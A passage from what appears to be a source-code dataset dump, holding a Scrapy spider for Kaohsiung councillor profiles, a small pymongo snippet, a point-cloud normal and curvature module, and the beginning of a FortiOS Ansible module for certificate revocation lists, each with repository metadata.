                u'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'
                u'vIdQWgVldMTP8lHus9yXBNFjqtHmbxERZ3/XeUF+5bdscZFOOQNbEOjqg5S9NXDiHiapT/FJrftud4xkOUrBnw2ipf+zq+gqZ+3YUY5MUN2CfSb6khLihYKV8PuIqp0pR+tYQdLNI9gz450nsaptenJe7dPiGeDsqy1V7tHznFD6AmSKlA3QzLmrHD99kuWnIpmKISNGTXpjQomlsFEBPKOWi2/XbZqhbJe8hAVKnc82zTh5WFPLtj6/mSAXOGIWte/1uct0ireO4Mt6H5yH9Occ9lJqrYteMMtKWaEaBu3KdogTQ3wF51dS3vswJmeQDrjyxw3j61GuoMM01RB1m+bAZX78sBRXZMzQkzOzl3YKGKu92e+OA+vd1rRpwMJw3C4WGPIHNrsKNlYjkmtuvuWwF37qq+6qG2EB+18HX5TbQqvjY+QZrqlS5CDWLfAE3vZ/IKYcDrjRmS1bf2SnN5vX3ghDyzyLAmaMFo1vfV09ulN8Ao41Wz7NZMIeHV9ISd8PQ+/R5LPul8DL3+2k7dtM/SbJufgju0YI0nHv7MCf/ypF0sXAkPmz7SAHfI6fmPPVFRn0V8L9dY8xTL87q7X4DXzUNcY0esUi0Kux5E3IdTu+pfWTdkHT+y+7pKTIHwWqELFM5K7v+xfweAT6hx8IkS89W1+OoPJq+G+cG9/zzaoiBnKc+AFEi1GAtjLdOJXc/lK+OONJktUKwWFu1XOaBNM+BQdRolI2QlZlOSbNBeqivsA82d86u6slI3sx9bD13rlp38DqNjynFQkJMGzUi/GVPdkLZjyVkk5CusLLYBD6WGtNprXwocCjBOjHghr6GfFnKmE5WLlODeG874it9CdJAq5C80ubr/f/hNK30PKYawnnkO7Cb9U3Pv93AW8/k90jqju84USoZi2hfVa5E1ma8GVHGs+EavG7GFraUqB5WXbUGIGK7x4MN87nMFwN88PmkP5VTawOqtRG3UdqFyWsIhyWR0phhVYBjhlOQvd9pwSWjl8OiDJEOXn04wRyUgGQkf+xDzYptXN3Xy9R51VSuQMl9bjbG6fk+0ciqYho1qvK5iPpNTihZGkHyWFYFiPJbxWGLbi/TgFxZ4WouAKr0nzNR38RT+Pd+YG3fLJaFu4Vfi1qHh5u0DSZXQAta1RqAWOg18f8tj3mEWeHX0wAQ6skT6mwIrp+hTf+sfbu2dpl/SjbjBEIrgbvS+KIFKnK6xw='
            ),
            'ctl00$txtSearch': u'全文檢索',
            'ctl00$hidSelectNode': u'1287/1293',
            'ctl00$ContentPlaceHolder1$ddlPeriod': '7',
            'ctl00$ContentPlaceHolder1$ddlPeriodTerms': '36',
            'ctl00$ContentPlaceHolder1$txtName': u'姓名及關鍵字',
            'ctl00$ContentPlaceHolder1$hidName': '',
            # Coordinates of the simulated click on the image search button.
            'ctl00$ContentPlaceHolder1$btnSearch.x': '33',
            'ctl00$ContentPlaceHolder1$btnSearch.y': '14'
        }
        return [FormRequest(
            "http://www.kcc.gov.tw/PeriodMembers/Search.aspx",
            formdata=payload, callback=self.parse)]

    def parse(self, response):
        """Follow every councilor introduction link on the search result page."""
        sel = Selector(response)
        nodes = sel.xpath(
            '//table/tr/td/span/a[contains(@href, "Introduction.aspx?KeyID")]')
        for node in nodes:
            yield Request(
                'http://www.kcc.gov.tw/PeriodMembers/%s'
                % node.xpath('@href').extract()[0],
                callback=self.parse_profile)

    def parse_profile(self, response):
        """Build a Councilor item from one councilor's introduction page."""
        sel = Selector(response)
        item = Councilor()
        item['election_year'] = '2010'
        item['county'] = '高雄市'
        image = sel.xpath(
            '//div/img[@id="ContentPlaceHolder1_lv_Pic_0"]/@src').extract()[0]
        item['image'] = urljoin(response.url, urllib.quote(image.encode('utf8')))
        # The page header reads e.g. u'某某某 議員'; split it into the
        # person's name and their title (議員/副議長/議長).
        header = sel.xpath(
            '//div[@class="info_data"]/table/tr/td/h4/text()').re(u'(.*?)(議員|副議長|議長)')
        item['name'] = re.sub(u'\(.*\)', '', header[0])
        item['title'] = header[1]
        item['in_office'] = True
        item['contact_details'] = []
        item['links'] = [{'url': response.url, 'note': u'議會個人官網'}]
        nodes = sel.xpath('//table/tr/td')
        for node in nodes:
            # Each data cell is identified by the nearest preceding <th> label.
            th = node.xpath('preceding-sibling::th[1]/text()').extract()
            if th:
                th = re.sub(u'[\s: ]', '', th[0])
            else:
                continue
            if re.search(u'性別', th):
                item['gender'] = node.xpath('text()').extract()[0]
            if re.search(u'所屬政黨', th):
                item['party'] = node.xpath('table/tr/td/text()').extract()[0]
            if re.search(u'聯絡電話', th):
                for phone in [re.sub(u'\s', '', x) for x in node.xpath('text()').extract()]:
                    # Bug fix: these are voice numbers, so label them u'電話';
                    # the original copy-pasted the fax label u'傳真' here.
                    item['contact_details'].append(
                        {'type': 'voice', 'label': u'電話', 'value': phone})
            if re.search(u'傳真電話', th):
                for phone in [re.sub(u'\s', '', x) for x in node.xpath('text()').extract()]:
                    item['contact_details'].append(
                        {'type': 'fax', 'label': u'傳真', 'value': phone})
            if re.search(u'電子郵件', th):
                for email in [re.sub(u'\s', '', x) for x in node.xpath('a/text()').extract()]:
                    item['contact_details'].append(
                        {'type': 'email', 'label': u'電子信箱', 'value': email})
            if re.search(u'通訊地址', th):
                for address in [re.sub(u'\s', '', x) for x in node.xpath('text()').extract()]:
                    item['contact_details'].append(
                        {'type': 'address', 'label': u'通訊處', 'value': address})
            if re.search(u'學歷', th):
                item['education'] = [re.sub(u'\s', '', x) for x in node.xpath('ul/text()').extract()]
            if re.search(u'經歷', th):
                item['experience'] = [re.sub(u'\s', '', x) for x in node.xpath('ul/text()').extract()]
            if re.search(u'備註', th):
                item['remark'] = node.xpath('span/font/text()').extract()
                if item['remark']:
                    # A non-empty remark records an early departure from
                    # office; the text usually contains an ROC-calendar date.
                    item['term_end'] = {}
                    item['term_end']['date'] = GetDate(node.xpath('span/font/text()').extract()[0])
                    item['term_end']['reason'] = ''
                    item['in_office'] = False
            if re.search(u'服務政見', th):
                item['platform'] = [re.sub(u'\s', '', x) for x in node.xpath('ol/text()').extract()]
        return item
| [
"twly.tw@gmail.com"
] | twly.tw@gmail.com |
3dc9f20502373cff728ee33faf9c522efd1ec8fc | fec863b67ec1ae65da7111bd8c77d0ab2ef1f6ce | /movie recommendation system/.history/testimportpython_20210430234858.py | e6c7b09f43d29238374e89404f4d08be511f11de | [] | no_license | kannan768/movie-recommendation-system | e6cf71620e25a0185fed3b37896137f1f39b0801 | 7460d440d44e77390e459ab10c535b6971c9c3ab | refs/heads/main | 2023-05-14T02:21:50.930672 | 2021-06-09T05:02:30 | 2021-06-09T05:02:30 | 375,225,316 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | import pymongo
import pandas as pd
client=pymongo.MongoClient("mongodb:local") | [
"kannanbsk1609080@gmail.com"
] | kannanbsk1609080@gmail.com |
c1dda275c9eb15fcb582e6bb36c529df26a40a49 | 163cb4945b7096559b02ced7f547189842373d6a | /pymethods/arrays/Pointsurface.py | c22fe0a7c8e40e3b55bfb921934d29a863e71130 | [] | no_license | mirasobhy/pymethods | 1e3de553648c8ff94c1dcf2bf98667208a0c21c9 | 7d72049c6a9be491aa92c2fc1828eb498bf281f4 | refs/heads/master | 2020-12-28T14:23:19.683888 | 2020-02-05T04:21:31 | 2020-02-05T04:21:31 | 238,367,632 | 0 | 0 | null | 2020-02-05T04:28:20 | 2020-02-05T04:28:19 | null | UTF-8 | Python | false | false | 10,781 | py | try:
from pymethods import (arrays, utils, pyplot, math, algorithms)
except ImportError:
from .. import arrays, utils, pyplot, math, algorithms
import pyvista as pv
from scipy.spatial import cKDTree
import numpy as np
import multiprocessing
from functools import wraps
import logging
# Number of logical CPUs available to the parallelised routines below.
_n_cpus = multiprocessing.cpu_count()
# Module-wide debug switch: enabling it turns on progress output (tqdm /
# prints) in the heavier geometry computations in this module.
_debug_ = False
show_tqdm = bool(_debug_)
class _CurvatureMultiScatter(pyplot.MultiScatter):
    """Scatter figure for the principal-curvature fields of a point cloud.

    Overrides the MultiScatter hooks: subplot titles report each field's
    mean plus/minus two standard deviations, series are labelled kappa_i
    (1-indexed), and the 3-D axes are equalised about the cloud centroid
    once plotting is finished.
    """
    def title_generator(self, name, stats):
        # Title reads "<name>, mu +/- 2 sigma = <mean> +/- 2x<std>" (LaTeX).
        spread = '%0.3f $\pm$ 2x%0.3f' % (stats.mean, stats.std)
        return f'{name}, $\mu \pm 2\sigma$={spread}'
    def name_generator(self, i):
        # Series names are 1-indexed: kappa_1, kappa_2, ...
        index = i + 1
        return f'$\kappa_{index}$'
    def post_plot(self, ax):
        centroid = self.data.mean(axis=-1)
        pyplot.equal_aspect_3d_centered(centroid, ax=ax)
class _CurvatureMultiScatterError(pyplot.MultiScatter):
    """Scatter figure of the relative percentage difference between the
    fitted and analytical principal curvatures.

    Same hooks as _CurvatureMultiScatter, but series are named with the
    symmetric relative-difference formula instead of kappa_i.
    """
    def title_generator(self, name, stats):
        spread = '%0.3f $\pm$ 2x%0.3f' % (stats.mean, stats.std)
        return f'{name}, $\mu \pm 2\sigma$={spread}'
    def name_generator(self, i):
        # LaTeX for the symmetric relative-difference metric, 1-indexed.
        math_title = r'2 * \dfrac{ |pred-true| }{pred+true}'
        index = i + 1
        return f'${math_title}_{index}$'
    def post_plot(self, ax):
        centroid = self.data.mean(axis=-1)
        pyplot.equal_aspect_3d_centered(centroid, ax=ax)
class PrintMethod:
    """Decorator factory that logs a message around a method call.

    ``@PrintMethod("doing X")`` logs "doing X" at DEBUG level before the
    wrapped callable runs and "completed doing X" after it returns, passing
    the return value through unchanged.  The wrapper keeps the explicit
    ``obj`` first argument so it can decorate unbound instance methods.
    """

    def __init__(self, base_verbatim: str) -> None:
        # Message logged before the call; "completed <message>" after it.
        self.base_verbatim = base_verbatim

    def __call__(self, function):
        """Return *function* wrapped with entry/exit DEBUG logging."""
        @wraps(function)
        def wrapper(obj, *args, **kwargs):
            logging.debug(self.base_verbatim)
            output = function(obj, *args, **kwargs)
            # Lazy %-style args: the message is only formatted if DEBUG
            # logging is actually enabled (idiomatic logging usage).
            logging.debug("completed %s", self.base_verbatim)
            return output
        return wrapper
class AlignNormalsBFS(algorithms.BreadthFirstSearch):
    """Breadth-first walk over the neighbour graph that makes per-point
    normals point consistently.

    ``properties`` holds one orthonormal basis per vertex; the normal is
    the last column.  Whenever a neighbour's normal is closer to the
    negated reference normal than to the reference itself, the whole
    neighbour basis is sign-flipped in place.
    """

    def post_vertex_query(self) -> None:
        # Cache the normal of the vertex just dequeued as the reference
        # direction for its unvisited neighbours.
        self.main_vector = self.properties[self.queried_vertex, :, -1]

    def on_unvisited_edge(self) -> None:
        neighbour_normal = self.properties[self.queried_edge_vertex, :, -1]
        toward = self.main_vector - neighbour_normal
        away = -self.main_vector - neighbour_normal
        dist_toward = sum(toward * toward)
        dist_away = sum(away * away)
        # Flip the neighbour's basis if its normal is closer to the
        # reversed reference direction.
        if dist_away < dist_toward:
            self.properties[self.queried_edge_vertex] *= -1
class Pointsurface(arrays.Vectorspace):
    """A point-cloud surface with nearest-neighbour queries, per-point
    normal estimation (local PCA via SVD) and principal-curvature fitting.

    Points are stored column-wise (``self.T`` iterates points, so the
    array is presumably 3 x N) — TODO confirm against arrays.Vectorspace.
    """
    def __init__(
            self, *args, leafsize=1000, neighbours=50,
            external=True, log=True, **kwargs) -> None:
        # NOTE(review): *args/**kwargs are accepted but unused here; the
        # array data is presumably consumed by the base class's __new__
        # (ndarray-subclass pattern) — confirm.
        self.log = log
        # cKDTree leaf size used when the tree is (lazily) built.
        self.leafsize = leafsize
        # True when the surface is closed and normals should point outward.
        self.external = external
        # Number of neighbours used for normal/curvature estimation.
        self.n_neighbours = neighbours
    def query_nearest(self, points: np.ndarray) -> np.ndarray:
        """Return the n_neighbours nearest surface points for each query point.

        When the query set is the surface itself (same length), also caches
        ``self.nn_weights`` (distances) and ``self.nn_indices``, dropping
        each point's own self-match (column 0 of the k+1 results).  The
        returned array is shaped (n_queries, 3, n_neighbours) after the
        swapaxes below.
        """
        if not hasattr(self, "kdtree"):
            self.compute_kdtree()
        points = utils.make_column(points)
        # Ask for one extra neighbour so the self-match can be discarded.
        dist_indices = self.kdtree.query(points.T, k=(self.n_neighbours+1))
        if len(points.T) == len(self.T):
            self.nn_weights, self.nn_indices = dist_indices
            self.nn_weights = self.nn_weights[:, 1:]
            self.nn_indices = self.nn_indices[:, 1:]
        indices = dist_indices[1][:, 1:]
        return self.kdtree.data[indices].swapaxes(1, 2).view(np.ndarray)
    @PrintMethod("computing kdtree")
    def compute_kdtree(self) -> cKDTree:
        """Build (once) and return the cKDTree over the surface points."""
        if not hasattr(self, 'kdtree'):
            self.kdtree = cKDTree(
                self.T, leafsize=self.leafsize)
            return self.kdtree
        else:
            return self.kdtree
    @PrintMethod("computing nearest neighbours from kdtree")
    def compute_nearest_neighbours(self) -> np.ndarray:
        """Cache and return the neighbours of every surface point."""
        points = utils.make_column(self)
        self.nearest_neighbours = self.query_nearest(points)
        return self.nearest_neighbours
    @PrintMethod("computing normals")
    def compute_all_normals(
            self) -> np.ndarray:
        """Estimate, orient and cache per-point bases; return the normals.

        ``point_basis`` holds one orthonormal basis per point; the normal
        is its last column, returned transposed (3 x N).
        """
        self.point_basis = self.compute_point_normals(self)
        self._align_normals()
        self.point_normals = self.point_basis[:, :, -1].T
        return self.point_normals
    @PrintMethod("computing principle curvatures")
    def compute_principle_curvatures(
            self, method='can_lsq_fit', n_processors='max') -> np.ndarray:
        """Fit and cache principal curvatures/directions at every point.

        *method* names a routine in ``algorithms.curvature_fitting``
        (default 'can_lsq_fit').  Normals are computed first if needed.
        Returns the (curvatures, directions) pair.
        """
        if not hasattr(self, 'point_basis'):
            self.compute_all_normals()
        self.principle_curvatures, self.principle_directions = \
            getattr(algorithms.curvature_fitting, method)(
                self, self.nn_indices, self.point_basis,
                n_processors=n_processors)
        return self.principle_curvatures, self.principle_directions
    @property
    def gaussian_curvature(self):
        """Gaussian curvature K = k1 * k2 at every point."""
        # NOTE(review): the assert message names a method that does not
        # exist; the actual method is compute_principle_curvatures.
        assert hasattr(self, 'principle_curvatures'),\
            'principle curvatures not calculated run \
                compute_principle_curvature_method'
        return self.principle_curvatures[0] * self.principle_curvatures[1]
    @property
    def mean_curvature(self):
        """Mean curvature H = (k1 + k2) / 2 at every point."""
        assert hasattr(self, 'principle_curvatures'),\
            'principle curvatures not calculated run \
                compute_principle_curvature_method'
        return (self.principle_curvatures[0] + self.principle_curvatures[1])/2
    @property
    def maximum_curvature(self):
        # First principal curvature k1 (no guard assert, unlike the above).
        return self.principle_curvatures[0]
    @property
    def minimum_curvature(self):
        # Second principal curvature k2.
        return self.principle_curvatures[1]
    def compute_point_normals(self, points: np.ndarray) -> np.ndarray:
        """Estimate a local orthonormal basis at every point via PCA.

        Builds the neighbourhood covariance of each point, takes its SVD
        (U's columns sorted by decreasing variance, so the last column is
        the surface normal), then runs a breadth-first walk so adjacent
        normals do not flip sign arbitrarily.  ``s`` and ``Vt`` are unused.
        """
        if not hasattr(self, 'nearest_neighbours'):
            nearest_neighbours = self.compute_nearest_neighbours()
        else:
            nearest_neighbours = self.nearest_neighbours
        # Centre each neighbourhood on its query point: (N, 3, k).
        centered_nn = nearest_neighbours - points.T[:, :, None]
        covar = np.einsum(
            "ijk, ikl -> ijl ", centered_nn, centered_nn.swapaxes(1, 2)
        )
        if show_tqdm:
            print("calculating the normals from SVD")
        U, s, Vt = np.linalg.svd(covar)
        align_bfs = AlignNormalsBFS(
            self.nn_indices, properties=U, show_progress=show_tqdm
        )
        align_bfs(start_vertex=0)
        return align_bfs.properties
    # NOTE(review): stray trailing quote inside the log message below —
    # harmless (it is only logged), but looks like a typo.
    @PrintMethod("pointing normals outside closed surface'")
    def _align_normals(self) -> None:
        """Globally orient the normals outward (inward if external=False).

        Heuristic: if shifting the centred points along their normals
        shrinks the total distance from the centroid, the normals point
        inward and every basis is sign-flipped.
        """
        normals = self.point_basis[:, :, -1].T
        centered_points = self - math.mean(self)
        sum_pos = np.sum(math.l2_norm(centered_points + normals))
        sum_neg = np.sum(math.l2_norm(centered_points - normals))
        if sum_neg > sum_pos:
            self.point_basis *= -1
        if not self.external:
            self.point_basis *= -1
    def plot_curvature(self, interval=1, *args, **kwargs):
        """Scatter-plot both fitted principal-curvature fields."""
        f, ax = _CurvatureMultiScatter(
            self, self.principle_curvatures,
            *args, **kwargs
        )(interval=interval)
        return f, ax
    def plot_analytical_curvature(self, interval=1, *args, **kwargs):
        """Scatter-plot the analytical curvatures (requires self.analytical)."""
        assert hasattr(self, 'analytical')
        f, ax = _CurvatureMultiScatter(
            self, (self.analytical.k_1, self.analytical.k_2),
            *args, **kwargs
        )(interval=interval)
        return f, ax
    def plot_error(self, interval=1, *args, **kwargs):
        """Scatter-plot the relative difference between fitted and
        analytical curvatures (requires self.analytical)."""
        assert hasattr(self, 'analytical')
        error_1 = math.metrics.relative_percentage_difference(
            self.analytical.k_1, self.principle_curvatures[0]
        )
        error_2 = math.metrics.relative_percentage_difference(
            self.analytical.k_2, self.principle_curvatures[1]
        )
        f, ax = _CurvatureMultiScatterError(
            self, (error_1, error_2),
            *args, **kwargs
        )(interval=interval)
        return f, ax
    def plot_surface(self, *args, **kwargs):
        """3-D scatter of the raw points (defaults to '.' markers)."""
        if len(args) == 0:
            args = ('.', )
        pyplot.plot3d(*self, *args, **kwargs)
    def check_normals_n_at_a_time(self, interval=1000, n_normals=3) -> None:
        """Debug view: show every *interval*-th point with its normal.

        NOTE(review): ``n_normals``, ``nn`` and ``nn_normals`` are computed
        but never used; each matching point opens its own blocking figure.
        """
        # Arrow length: mean distance to the 4th nearest neighbour.
        scale = np.mean(self.nn_weights[:, 3])
        for i, (point, normal) in enumerate(
                zip(self.T, self.point_normals.T)):
            if i % interval == 0:
                normal = normal*scale
                I_nearest = self.nn_indices[i]
                nn = self[:, I_nearest]
                nn_normals = self.point_normals[I_nearest]
                pyplot.plot3d(*self, '.', alpha=1, markersize=1)
                pyplot.quiver3d(*point, *normal)
                pyplot.equal_aspect_3d_centered(point)
                pyplot.show()
    def check_all_normals(self, interval=100) -> None:
        """Debug view: quiver plot of every *interval*-th normal at once."""
        centroid = math.mean(self)
        scale = np.mean(self.nn_weights[:, 3])
        normals = self.point_normals[:, ::interval]*scale
        pyplot.plot3d(*self[:, ::interval], '.', alpha=1, markersize=1)
        pyplot.quiver3d(
            *self[:, ::interval],
            *normals)
        pyplot.equal_aspect_3d_centered(centroid)
        pyplot.show()
    def write_structured_vtk(self, newshape):
        """Build a pyvista StructuredGrid from the points reshaped to
        *newshape* (= [2 or 3, ni, nj]), attaching curvature scalars.

        NOTE(review): the mesh is built but never saved or returned, so
        this looks unfinished; also pyvista exposes the scalar store as
        ``point_arrays`` (``points_arrays`` would raise) — verify.
        """
        newshape = list(newshape)
        assert all(
            [
                len(newshape) == 3,
                any(
                    [newshape[0] == 3, newshape[0] == 2]
                )
            ]
        )
        to_write = np.array(self.copy()).reshape(newshape)
        mesh = pv.StructuredGrid(*to_write)
        if hasattr(self, 'principle_curvatures'):
            for name in ('gaussian_curvature', 'mean_curvature', 'maximum_curvature', 'minimum_curvature'):
                temp = np.array(getattr(self, name)).reshape(newshape[1:])
                mesh.points_arrays[name] = temp.squeeze().flatten('F')
# if __name__ == "__main__":
# import pathlib
# data_folder = pathlib.Path(
# r'I:\CNNForCFD\test12\true'
# )
# file = data_folder/'00000.vtk'
# pv_obj = pv.read(file)
# points = pv_obj.points.T
# test_points = points[:, ::20]*1000
# # test_points = points*1000
# psurf = Pointsurface(
# test_points, leafsize=100, neighbours=13, external=True)
# psurf.compute_all_normals()
# psurf.compute_principle_curvatures(n_processors=1)
# if False:
# ii = 500
# ids = psurf.nn_indices[ii]
# xx, yy = psurf.principle_directions[ii].T
# X, Y, Z = psurf.point_basis[ii].T
# pyplot.plot3d(*psurf, '.', alpha=0.5, markersize=2)
# pyplot.plot3d(*psurf[:, ii, None], 'go')
# pyplot.plot3d(*psurf[:, ids], 'ro')
# pyplot.quiver3d(*psurf[:, ii, None], *X[:, None], color='blue')
# pyplot.quiver3d(*psurf[:, ii, None], *Y[:, None], color='blue')
# pyplot.quiver3d(*psurf[:, ii, None], *Z[:, None], color='green')
# pyplot.quiver3d(*psurf[:, ii, None], *xx[:, None], color='red')
# pyplot.quiver3d(*psurf[:, ii, None], *yy[:, None], color='red')
# pyplot.equal_aspect_3d_centered(psurf[:, ii, None])
# pyplot.show()
# psurf.plot_curvature()
# pyplot.show()
# psurf.check_all_normals(interval=1)
# print('done')
| [
"38807452+hj40@users.noreply.github.com"
] | 38807452+hj40@users.noreply.github.com |
7d851a9a75ada74b98b107a496c6122be5559ee5 | 578d83b3c4b08ec703b2d66fb073a00224ef7ab0 | /fortimanager/library/fortios_vpn_certificate_crl.py | ec7b1318709b364a8303c8aa1d69395f663e5f7c | [] | no_license | prajavat/fortiget | 9cb73760b1704db9e633ef835ea6b6947ba87647 | 7ed08b1b98284b21934743c1830629c5b48b510c | refs/heads/main | 2023-06-29T18:29:51.963775 | 2021-08-05T07:53:03 | 2021-08-05T07:53:03 | 334,605,185 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,667 | py | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019-2020 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_vpn_certificate_crl
short_description: Certificate Revocation List as a PEM file in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify vpn_certificate feature and crl category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.2.0
version_added: "2.9"
author:
- Link Zheng (@chillancezen)
- Jie Xue (@JieX19)
- Hongbin Lu (@fgtdev-hblu)
- Frank Shen (@frankshen01)
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Legacy fortiosapi has been deprecated, httpapi is the preferred way to run playbooks
requirements:
- ansible>=2.9.0
options:
access_token:
description:
- Token-based authentication.
Generated from GUI of Fortigate.
type: str
required: false
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
state:
description:
- Indicates whether to create or remove the object.
type: str
required: true
choices:
- present
- absent
vpn_certificate_crl:
description:
- Certificate Revocation List as a PEM file.
default: null
type: dict
suboptions:
crl:
description:
- Certificate Revocation List as a PEM file.
type: str
http_url:
description:
- HTTP server URL for CRL auto-update.
type: str
last_updated:
description:
- Time at which CRL was last updated.
type: int
ldap_password:
description:
- LDAP server user password.
type: str
ldap_server:
description:
- LDAP server name for CRL auto-update.
type: str
ldap_username:
description:
- LDAP server user name.
type: str
name:
description:
- Name.
required: true
type: str
range:
description:
- Either global or VDOM IP address range for the certificate.
type: str
choices:
- global
- vdom
scep_cert:
description:
- Local certificate for SCEP communication for CRL auto-update. Source vpn.certificate.local.name.
type: str
scep_url:
description:
- SCEP server URL for CRL auto-update.
type: str
source:
description:
- Certificate source type.
type: str
choices:
- factory
- user
- bundle
source_ip:
description:
- Source IP address for communications to a HTTP or SCEP CA server.
type: str
update_interval:
description:
- Time in seconds before the FortiGate checks for an updated CRL. Set to 0 to update only when it expires.
type: int
update_vdom:
description:
- VDOM for CRL update. Source system.vdom.name.
type: str
'''
EXAMPLES = '''
- hosts: fortigates
collections:
- fortinet.fortios
connection: httpapi
vars:
vdom: "root"
ansible_httpapi_use_ssl: yes
ansible_httpapi_validate_certs: no
ansible_httpapi_port: 443
tasks:
- name: Certificate Revocation List as a PEM file.
fortios_vpn_certificate_crl:
vdom: "{{ vdom }}"
state: "present"
access_token: "<your_own_value>"
vpn_certificate_crl:
crl: "<your_own_value>"
http_url: "<your_own_value>"
last_updated: "5"
ldap_password: "<your_own_value>"
ldap_server: "<your_own_value>"
ldap_username: "<your_own_value>"
name: "default_name_9"
range: "global"
scep_cert: "<your_own_value> (source vpn.certificate.local.name)"
scep_url: "<your_own_value>"
source: "factory"
source_ip: "84.230.14.43"
update_interval: "15"
update_vdom: "<your_own_value> (source system.vdom.name)"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible_collections.fortinet.fortios.plugins.module_utils.fortios.fortios import FortiOSHandler
from ansible_collections.fortinet.fortios.plugins.module_utils.fortios.fortios import check_legacy_fortiosapi
from ansible_collections.fortinet.fortios.plugins.module_utils.fortimanager.common import FAIL_SOCKET_MSG
def filter_vpn_certificate_crl_data(json):
    """Project *json* onto the option keys this module understands.

    Keys that are absent or whose value is None are dropped, so the
